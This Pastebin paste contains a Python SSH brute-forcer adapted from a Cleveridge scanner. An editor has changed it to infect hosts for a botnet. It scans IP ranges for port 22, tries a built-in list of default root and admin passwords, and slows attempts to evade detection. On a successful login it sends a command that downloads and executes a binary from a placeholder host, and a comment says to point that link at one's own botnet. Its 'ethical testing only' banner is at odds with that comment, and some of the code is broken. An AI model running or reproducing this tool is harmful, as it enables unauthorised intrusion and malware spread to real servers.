API tools faq
paste
Advertisement
ZonoxinHF

Cleveridge SSH Scanner/Bruteforcer Edited by Zonoxin

ZonoxinHF
Aug 14th, 2015
919
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 15.28 KB | None | 0 0
raw download clone embed print report
  1. #!/usr/bin/python
  2.  
  3. #############################################################
  4. # Script to Brute Force SSH access automatically, thr. TOR #
  5. # written by redN00ws @ Cleveridge #
  6. #############################################################
  7. # #
  8. # C l e v e r i d g e - Ethical Hacking Lab #
  9. # (https://cleveridge.org) #
  10. # #
  11. #############################################################
  12. # I Zonoxin have edited this code #
  13. # To Fit My liking #
  14. #############################################################
  15. # Control+F to "EDIT HERE" and change the wget link to your botnet.
  16.  
  17. import pxssh
  18. import getpass
  19. import glob
  20. import os
  21. import socket
  22. import sys
  23. import time
  24. from datetime import datetime
  25. from urllib import urlopen
  26.  
  27.  
  28.  
  29.  
  30. #++ FUNCTIONS //#
  31.  
  32. # func Writelog
  33. def func_writelog(how, logloc, txt): # how: a=append, w=new write
  34. with open(logloc, how) as mylog:
  35. mylog.write(txt)
  36.  
  37.  
  38. # func ScanHost
  39. def func_scanhost(ip, logloc):
  40. # Log Scan
  41. txt = "\n*****************************\nScanning IP : %s" % (ip)
  42. func_writelog("a", logloc, txt + "\n")
  43. print txt
  44.  
  45. # check if SSH-port is open
  46. sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
  47. result = sock.connect_ex((ip, 22))
  48.  
  49. if result == 0: # if SSH-port is open
  50. txt = "Port 22 (SSH) is accessible."
  51. func_writelog("a", logloc, txt + "\n")
  52. print txt
  53. found = False # default : credentials not found yet
  54. blocked = False # default : not blocked by victim host
  55. tried = 0
  56.  
  57. for usr in user: # run through all usernames
  58. if found == True: # if credentials were found with previous combination -> exit
  59. break
  60.  
  61. if blocked == True: # if you are blocked by victim -> exit and go to next victim
  62. break
  63.  
  64. for pwd in pswd: # run through all passwords for each username
  65. print('* Try %s:%s' % (usr, pwd)),
  66. time.sleep (500.0 / 1000.0) # slow down to prevent detection
  67. tried += 1
  68.  
  69. try: # try to connect
  70. s = pxssh.pxssh()
  71. s.login (hostname, usr, pwd)
  72. s.sendline ('cd /tmp;wget http://127.0.0.1/x86 -o x86;chmod +x x86;./86') # EDIT HERE!
  73. s.prompt() # match the prompt
  74. print "@ %s SUCCESS ***********" % (ip)
  75. print s.before # print everything before the prompt.
  76. txt = '%s:%s @ %s SUCCESS ************/n%s' % (usr, pwd, ip, s.before)
  77. func_writelog("a", logloc, txt + "\n")
  78. found = True
  79. break
  80. except Exception as ex: # can't connect with this credentials
  81. print "failed - "
  82. response = str(ex)
  83. print response
  84. if response == "could not synchronize with original prompt" or response == "could not set shell prompt" :
  85. txt = 'Stopped due to Error response'
  86. func_writelog('a', logloc, txt + '\n')
  87. print txt
  88. blocked = True
  89. break
  90. elif response[:17] == "End Of File (EOF)" :
  91. txt = 'Stopped due to blocked by victim'
  92. func_writelog('a', logloc, txt + '\n')
  93. print txt
  94. blocked = True
  95. break
  96.  
  97. txt = "Tried " + str(tried) + " combinations"
  98. func_writelog("a", logloc, txt + "\n")
  99. print txt
  100.  
  101.  
  102. else: # if SSH-port is closed
  103. txt = "Port 22 (SSH) is closed."
  104. func_writelog("a", logloc, txt + "\n")
  105. print txt
  106.  
  107. # func CheckIPrange
  108. def func_checkIPrange(ip_range):
  109. print 'Checking IP range... ',
  110. reply = False
  111. posHyphen = ip_range.find('-')
  112. if int(posHyphen) > 6 and int(posHyphen) <= 15 :
  113. ip_first = ip_range[:posHyphen]
  114. ip_untill = ip_range[posHyphen +1:]
  115. ip_first_parts = ip_first.split('.')
  116. if len(ip_first_parts) == 4 :
  117. try :
  118. if (int(ip_first_parts[0]) < 257 and int(ip_first_parts[0]) >= 0) and (int(ip_first_parts[1]) < 257 and int(ip_first_parts[1]) >= 0) and (int(ip_first_parts[2]) < 257 and int(ip_first_parts[2]) >= 0) and (int(ip_first_parts[3]) < 257 and int(ip_first_parts[3]) >= 0) and (int(ip_untill) < 257 and int(ip_untill) >= 0):
  119. reply = True
  120. except Exception :
  121. #nothing
  122. print '.',
  123.  
  124. print "Done"
  125. return reply
  126.  
  127. # func Create IP list of range
  128. def func_createIPlist(ip_range):
  129. print 'Creating IP list...',
  130. posHyphen = ip_range.find('-')
  131. ip_first = ip_range[:posHyphen]
  132. ip_untill = ip_range[posHyphen +1:]
  133. ip_first_parts = ip_first.split('.')
  134. ip_list = []
  135.  
  136. for x in range(int(ip_first_parts[3]), int(ip_untill)+1):
  137. ip_list.append(str(ip_first_parts[0]) + '.' + str(ip_first_parts[1]) + '.' + str(ip_first_parts[2]) + '.' + str(x))
  138. print 'Done'
  139. return ip_list
  140.  
  141. # func Get files from /data directory
  142. def func_getDataFiles():
  143. data_files = glob.glob("data/*")
  144. return data_files
  145.  
  146. # func fill Text with something
  147. def func_fillText(item, times):
  148. txt = ""
  149. i = 0
  150. while i < int(times) :
  151. txt += str(item)
  152. i += 1
  153. return txt
  154.  
  155. # func Show Data Files to attack
  156. def func_printDataFileOptions(data_files):
  157.  
  158. # If no files in default directory
  159. empty = False
  160. if data_files == False or len(data_files) == 0:
  161. empty = True
  162.  
  163. # Add files to menu options
  164. i = 1
  165. ops = {}
  166. for f in data_files :
  167. ops[i] = f
  168. i += 1
  169.  
  170. # Add default items to menu options
  171. ops['e'] = "Exit Program"
  172.  
  173. # Create Menu
  174. ln = []
  175. inner_length = 50
  176. ln.append(" *" + func_fillText("*", inner_length) + "*")
  177. ln.append(" * " + "Select a file from the data/ directory" + func_fillText(" ", inner_length-38-2) + " *") # inner_length-38-2 = inner_length - text_length - outside spaces
  178. ln.append(" *" + func_fillText("-", inner_length) + "*")
  179.  
  180. if empty == True:
  181. ln.append(" * " + "Data directory is empty" + func_fillText(" ", inner_length-23-2) + " *")
  182. ln.append(" *" + func_fillText(" ", inner_length) + "*")
  183.  
  184. for o in ops :
  185. o_txt = str(o) + " : " + str(ops[o])
  186.  
  187. # if text to long for menu
  188. if len(o_txt) > 45 :
  189. first = o_txt[:35]
  190. last = o_txt[-6:]
  191. o_txt = first + "..." + last
  192.  
  193. # file output
  194. ln.append(" * " + o_txt + func_fillText(" ", inner_length-len(o_txt)-2) + " *")
  195.  
  196. ln.append(" *" + func_fillText("*", inner_length) + "*")
  197.  
  198. txt = "\n"
  199. for item in ln :
  200. txt = txt + str(item) + "\n"
  201.  
  202. # return
  203. return txt
  204.  
  205. # func Exit
  206. def func_exit():
  207. print "Exiting...\n\nThanks for using\nCleveridge SSH Scanner\n\nCleveridge : https://cleveridge.org/nSSH Scanner : https://github.com/Cleveridge/cleveridge-ssh-scanner"
  208.  
  209.  
  210.  
  211.  
  212.  
  213. #++ PROGRAM ++#
  214. os.system('clear')
  215. user = ["root", "admin", "sysadmin", "oracle", "webmaster"]
  216. pswd = ["root", "toor", "admin", "000000", "1111", "111111", "11111111", "123", "123.com", "123123", "123123123", "1234", "12345", "123456", "1234567", "12345678", "123456789", "1234567890", "1234qwer", "123abc", "123qwe", "123qweasd", "147147", "1q2w3e", "1q2w3e4r", "1q2w3e4r5t", "1q2w3e4r5t6y", "1qaz2wsx", "1qaz2wsx3edc", "1qazxsw2", "abc123", "abc@123", "Admin@123", "P@ssw0rd", "Password1", "a123456", "admin1", "admin123", "admin@123", "adminadmin", "administrator", "changeme", "cisco", "cisco123", "default", "firewall", "letmein", "linux", "oracle", "p@ssw0rd", "passw0rd", "password", "q1w2e3r4", "q1w2e3r4t5", "qwerty", "r00t", "redhat", "root123", "rootpass", "rootroot", "server", "test", "test123", "zaq1xsw2"]
  217.  
  218. print "************************************************"
  219. print "|| CLEVERIDGE SSH SCANNER ||"
  220. print "************************************************"
  221. print "|| IMPORTANT: ||"
  222. print "|| This tool is for ethical testing purpose ||"
  223. print "|| only. ||"
  224. print "|| Cleveridge and its owners can't be held ||"
  225. print "|| responsible for misuse by users. ||"
  226. print "|| Users have to act as permitted by local ||"
  227. print "|| law rules. ||"
  228. print "************************************************"
  229. print "|| ||"
  230. print "|| Edited by Zonoxin ||"
  231. print "************************************************\n"
  232. print "Version %s build %s" % (version, build)
  233.  
  234.  
  235.  
  236.  
  237.  
  238.  
  239.  
  240.  
  241.  
  242.  
  243. """
  244. ON FIRST RUN : SETTING UP BASIC FILES AND FOLDERS
  245. BEGIN:
  246. """
  247.  
  248. #-- Creating default log directory
  249. logdir = "log"
  250. if not os.path.exists(logdir):
  251. os.makedirs(logdir)
  252. txt = "Directory 'log/' created"
  253. print txt
  254.  
  255. """ Every run : create log file """
  256. #-- Creating log file in directory 'log' --#
  257. now = datetime.now()
  258. logfile = str(now.year) + str(now.month) + str(now.day) + str(now.hour) + str(now.minute) + str(now.second) + ".log"
  259. print "Creating log : log/%s" % (logfile),
  260. logloc = logdir + "/" + logfile
  261. with open(logloc, "w") as mylog:
  262. os.chmod(logloc, 0660)
  263. mylog.write("Log created by Cleveridge SSH Scanner (EDITED BY ZONOXIN) - " + version + " build " + build + "\n\n")
  264. print ".... Done"
  265. """ """
  266.  
  267. #-- Creating default configuration in directory 'cnf' --#
  268. txt = "Checking configuration status"
  269. func_writelog("a", logloc, txt + "\n")
  270. print txt
  271.  
  272.  
  273. # if no cnf directory -> Create
  274. cnfdir = "cnf"
  275. if not os.path.exists(cnfdir) :
  276. os.makedirs(cnfdir)
  277. txt = "Directory 'cnf/' created"
  278. func_writelog("a", logloc, txt + "\n")
  279. print txt
  280.  
  281.  
  282. # if no user ip file in cnf -> create
  283. file_userip = cnfdir + "/userip.cnf"
  284. if not os.path.exists(file_userip) :
  285. with open(file_userip, "w") as myuserip :
  286. os.chmod(file_userip, 0660)
  287. myuserip.write("1.1.1.1")
  288. txt = "File 'userip.cnf' created in 'cnf/'"
  289. func_writelog("a", logloc, txt + "\n")
  290. print txt
  291.  
  292.  
  293. # if default file directory not exist -> create
  294. datadir = 'data'
  295. if not os.path.exists(datadir) :
  296. os.makedirs(datadir)
  297. txt = "Directory 'data/' created"
  298. func_writelog("a", logloc, txt + "\n")
  299. print txt
  300.  
  301. """
  302. :END
  303. ON FIRST RUN : SETTING UP BASIC FILES AND FOLDERS
  304. """
  305.  
  306.  
  307.  
  308.  
  309.  
  310.  
  311.  
  312. print " " # to create a better view of the logs on screen
  313.  
  314.  
  315. #-- Register date and time of scan --#
  316. txt = "Tool started : %s/%s/%s - %s:%s:%s" % (now.year, now.month, now.day, now.hour, now.minute, now.second)
  317. func_writelog("a", logloc, txt + "\n\n")
  318. print txt
  319. print " "
  320.  
  321. #-- Verify users IP --#
  322. print "Fill out your machines IP. This is the IP you want to hide!!"
  323. print "If the IP is the same as the default, just hit [Enter]..."
  324. with open(file_userip, 'r') as cont :
  325. content = cont.read()
  326. my_ip = raw_input("Your IP [" + content + "] : ") or content
  327. with open(file_userip, 'w') as myuserip : # save new value
  328. myuserip.write(my_ip[:15]) # save not more then 15 chars
  329.  
  330.  
  331. #-- Local IP --#
  332. txt = "Local IP : " + [(s.connect(('8.8.8.8', 80)), s.getsockname()[0], s.close()) for s in [socket.socket(socket.AF_INET, socket.SOCK_DGRAM)]][0][1]
  333. func_writelog("a", logloc, txt + "\n")
  334. print txt
  335.  
  336. #-- Visible IP --#
  337. try :
  338. visible_ip = urlopen('https://cleveridge.org/_exchange/open_files/return_ip.php?s=ssh_scan').read()
  339. except Exception :
  340. visible_ip = urlopen('https://enabledns.com/ip').read()
  341. txt = "Visible IP : " + visible_ip
  342. func_writelog("a", logloc, txt + "\n")
  343. print txt
  344.  
  345. #-- if private IP is visible
  346. if visible_ip == my_ip: # if your real ip is visible -> Break up
  347. txt = " Your IP is visible !!!\n \n" # Add 'Socks4 127.0.0.1 9050' to /etc/proxychains.conf.\n Start Tor service, then \n proxychains ./cl_ssh_scan.py"
  348. func_writelog("a", logloc, txt + "\n")
  349. print txt
  350.  
  351. if True :
  352.  
  353. # Select Method
  354. print "\n\n *************************************\n * Select a method : *\n *************************************\n * h : Scan one host ip *\n * r : Scan a range of IP's *\n * f : Scan IP's from file (one/row) *\n *************************************"
  355. method = raw_input(' * Method : ')
  356. txt = "Selected Method : "
  357. func_writelog("a", logloc, txt)
  358. print txt,
  359.  
  360.  
  361. if method == 'h':
  362. # Selected Method : (h)ost
  363.  
  364. txt = "Scan one host IP"
  365. func_writelog("a", logloc, txt + "\n\n")
  366. print txt
  367.  
  368. hostname = raw_input('Hostname : ')
  369. func_scanhost(hostname, logloc)
  370.  
  371. elif method == 'r':
  372. # Selected Method : (r)ange
  373.  
  374. txt = "Scan IP range"
  375. func_writelog("a", logloc, txt + "\n\n")
  376. print txt
  377.  
  378. print "Fill out an IP range like 192.168.0.1-25"
  379. ip_range = raw_input('IP range : ')
  380.  
  381. # If IP range is valid > execute
  382. if(func_checkIPrange(ip_range) != True): # if not valid
  383. txt = "IP range not valid !! e.g. 192.168.0.1-25"
  384. func_writelog("a", logloc, txt + "\n")
  385. print txt
  386. else : # if valid ip range
  387.  
  388. # log
  389. txt = "IP range %s is valid" % (ip_range)
  390. func_writelog("a", logloc, txt + "\n\n")
  391. print txt
  392.  
  393. # creating ip list
  394. ip_l = func_createIPlist(ip_range)
  395.  
  396. # run scan for every ip in range
  397. for hostname in ip_l:
  398. func_scanhost(hostname, logloc)
  399.  
  400.  
  401. elif method == 'f':
  402. #Selected Method : (f)ile
  403.  
  404. txt = "Scan IP's from file"
  405. func_writelog("a", logloc, txt + "\n\n")
  406. print txt
  407.  
  408. d_files = func_getDataFiles()
  409. txt = func_printDataFileOptions(d_files)
  410. print txt[:-1] # to remove the last \n
  411.  
  412. ip_file = raw_input(" * Select : ")
  413.  
  414. # Get File contents or Exit
  415. goon = False
  416. try:
  417. val = int(ip_file)
  418. goon = True
  419. val = val -1 # because array keys are options -1
  420. except Exception :
  421. print 'No file selected'
  422.  
  423. # if selection is an integer and if selection exists -> execute else exit
  424. ip_l = []
  425. if goon == True :
  426. print d_files[val]
  427. try :
  428. fl = open(d_files[val], 'r')
  429.  
  430. txt = "Selected File : " + str(d_files[val])
  431. func_writelog("a", logloc, txt + "\n")
  432. print txt
  433.  
  434.  
  435. for line in fl :
  436. ip_l.append(line)
  437. print ' - ' + line
  438. except Exception :
  439. print 'Selection not valid'
  440. else :
  441. func_exit()
  442.  
  443. # if ip's in file else exit
  444. if len(ip_l) > 0 :
  445. # If valid IP -> run scan
  446. for hostname in ip_l :
  447. try :
  448. socket.inet_aton(hostname)
  449. func_scanhost(hostname, logloc)
  450. except socket.error :
  451. print "Contains an unvalid IP"
  452. else :
  453. print "The selected file seems empty"
  454. func_exit()
  455.  
  456. else :
  457. func_exit()
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!